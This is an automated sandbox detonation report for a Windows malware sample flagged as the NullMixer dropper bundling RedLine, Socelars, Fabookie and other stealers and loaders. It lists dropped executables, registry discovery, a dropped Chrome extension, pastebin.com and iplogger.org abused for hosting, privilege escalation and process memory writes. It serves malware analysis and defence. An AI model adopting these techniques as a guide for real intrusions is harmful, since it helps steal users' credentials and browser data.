memory/1836-228-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1836-226-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1836-224-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1392-233-0x0000000002760000-0x0000000002805000-memory.dmp

memory/1392-237-0x0000000002810000-0x00000000028A2000-memory.dmp

memory/1392-234-0x0000000002810000-0x00000000028A2000-memory.dmp

memory/1392-239-0x00000000023A0000-0x0000000002548000-memory.dmp

memory/1392-238-0x0000000002810000-0x00000000028A2000-memory.dmp

memory/924-240-0x0000000000400000-0x000000000089C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-23 18:38

Reported

2024-11-23 18:40

Platform

win10v2004-20241007-en

Max time kernel

79s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-THB94.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1256 set thread context of 3028 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-THB94.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768607450469010" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2368 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2368 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2368 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3320 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe
PID 3320 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe
PID 3320 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe
PID 3476 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3476 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
